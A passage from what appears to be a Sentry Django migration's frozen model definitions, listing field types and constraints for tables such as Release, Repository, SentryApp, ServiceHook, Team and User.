'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'redirect_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'sentry.projectsymcachefile': {
'Meta': {'unique_together': "(('project', 'debug_file'),)", 'object_name': 'ProjectSymCacheFile', 'index_together': '()'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'debug_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDebugFile']", 'on_delete': 'models.DO_NOTHING', 'db_column': "'dsym_file_id'"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectteam': {
'Meta': {'unique_together': "(('project', 'team'),)", 'object_name': 'ProjectTeam', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.promptsactivity': {
'Meta': {'unique_together': "(('user', 'feature', 'organization_id', 'project_id'),)", 'object_name': 'PromptsActivity', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.pullrequest': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'PullRequest', 'db_table': "'sentry_pull_request'", 'index_together': "(('repository_id', 'date_added'), ('organization_id', 'merge_commit_sha'))"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'merge_commit_sha': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.pullrequestcommit': {
'Meta': {'unique_together': "(('pull_request', 'commit'),)", 'object_name': 'PullRequestCommit', 'db_table': "'sentry_pullrequest_commit'", 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'pull_request': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.PullRequest']"})
},
'sentry.rawevent': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'RawEvent', 'index_together': '()'},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.recentsearch': {
'Meta': {'unique_together': "(('user', 'organization', 'type', 'query_hash'),)", 'object_name': 'RecentSearch', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'query': ('django.db.models.fields.TextField', [], {}),
'query_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.relay': {
'Meta': {'unique_together': '()', 'object_name': 'Relay', 'index_together': '()'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_internal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'relay_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
'sentry.release': {
'Meta': {'unique_together': "(('organization', 'version'),)", 'object_name': 'Release', 'index_together': '()'},
'authors': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'commit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_released': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'releases'", 'symmetrical': 'False', 'through': "orm['sentry.ReleaseProject']", 'to': "orm['sentry.Project']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'total_deploys': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'sentry.releasecommit': {
'Meta': {'unique_together': "(('release', 'commit'), ('release', 'order'))", 'object_name': 'ReleaseCommit', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseenvironment': {
'Meta': {'unique_together': "(('organization', 'release', 'environment'),)", 'object_name': 'ReleaseEnvironment', 'db_table': "'sentry_environmentrelease'", 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile', 'index_together': "(('release', 'name'),)"},
'dist': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Distribution']", 'null': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseheadcommit': {
'Meta': {'unique_together': "(('repository_id', 'release'),)", 'object_name': 'ReleaseHeadCommit', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.releaseproject': {
'Meta': {'unique_together': "(('project', 'release'),)", 'object_name': 'ReleaseProject', 'db_table': "'sentry_release_project'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseprojectenvironment': {
'Meta': {'unique_together': "(('project', 'release', 'environment'),)", 'object_name': 'ReleaseProjectEnvironment', 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'new_issues_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.repository': {
'Meta': {'unique_together': "(('organization_id', 'name'), ('organization_id', 'provider', 'external_id'))", 'object_name': 'Repository', 'index_together': '()'},
'config': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.reprocessingreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'ReprocessingReport', 'index_together': '()'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.rule': {
'Meta': {'unique_together': '()', 'object_name': 'Rule', 'index_together': '()'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.savedsearch': {
'Meta': {'unique_together': "(('project', 'name'), ('organization', 'owner', 'type'))", 'object_name': 'SavedSearch', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_global': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'query': ('django.db.models.fields.TextField', [], {}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True'})
},
'sentry.savedsearchuserdefault': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'SavedSearchUserDefault', 'db_table': "'sentry_savedsearch_userdefault'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'savedsearch': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.SavedSearch']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.scheduleddeletion': {
'Meta': {'unique_together': "(('app_label', 'model_name', 'object_id'),)", 'object_name': 'ScheduledDeletion', 'index_together': '()'},
'aborted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 6, 15, 0, 0)'}),
'guid': ('django.db.models.fields.CharField', [], {'default': "'a426ce10c7824ca2a31b88c01cf51105'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'object_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.scheduledjob': {
'Meta': {'unique_together': '()', 'object_name': 'ScheduledJob', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'payload': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.sentryapp': {
'Meta': {'unique_together': '()', 'object_name': 'SentryApp', 'index_together': '()'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiApplication']"}),
'author': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_alertable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.TextField', [], {}),
'overview': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'owned_sentry_apps'", 'to': "orm['sentry.Organization']"}),
'proxy_user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.User']"}),
'redirect_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'schema': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'95221a10-3d96-4af7-8670-be0f643dd7a1'", 'max_length': '64'}),
'webhook_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'sentry.sentryappavatar': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.SentryApp']"})
},
'sentry.sentryappcomponent': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppComponent', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'schema': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'components'", 'to': "orm['sentry.SentryApp']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'uuid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'})
},
'sentry.sentryappinstallation': {
'Meta': {'unique_together': '()', 'object_name': 'SentryAppInstallation', 'index_together': '()'},
'api_grant': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app_installation'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiGrant']"}),
'api_token': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'sentry_app_installation'", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['sentry.ApiToken']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_app_installations'", 'to': "orm['sentry.Organization']"}),
'sentry_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'installations'", 'to': "orm['sentry.SentryApp']"}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'c025a308-74d1-4b11-95f4-f74b0dba0a37'", 'max_length': '64'})
},
'sentry.servicehook': {
'Meta': {'unique_together': '()', 'object_name': 'ServiceHook', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'351f827fb83b47d2b3d4c8a8a379cc632e91af06c5d44946abd9396a33877cc8'"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '512'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.servicehookproject': {
'Meta': {'unique_together': "(('service_hook', 'project_id'),)", 'object_name': 'ServiceHookProject', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'service_hook': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ServiceHook']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project_id', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project_id', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'", 'index_together': "(('project_id', 'key', 'last_seen'),)"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.teamavatar': {
'Meta': {'unique_together': '()', 'object_name': 'TeamAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Team']"})
},
'sentry.timeseriessnapshot': {
'Meta': {'unique_together': '()', 'object_name': 'TimeSeriesSnapshot', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'end': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'period': ('django.db.models.fields.IntegerField', [], {}),
'start': ('django.db.models.fields.DateTimeField', [], {}),
'values': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'sentry.db.models.fields.array.ArrayField', [], {'null': 'True'})})
},
'sentry.user': {
'Meta': {'unique_together': '()', 'object_name': 'User', 'db_table': "'auth_user'", 'index_together': '()'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_password_expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_sentry_app': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
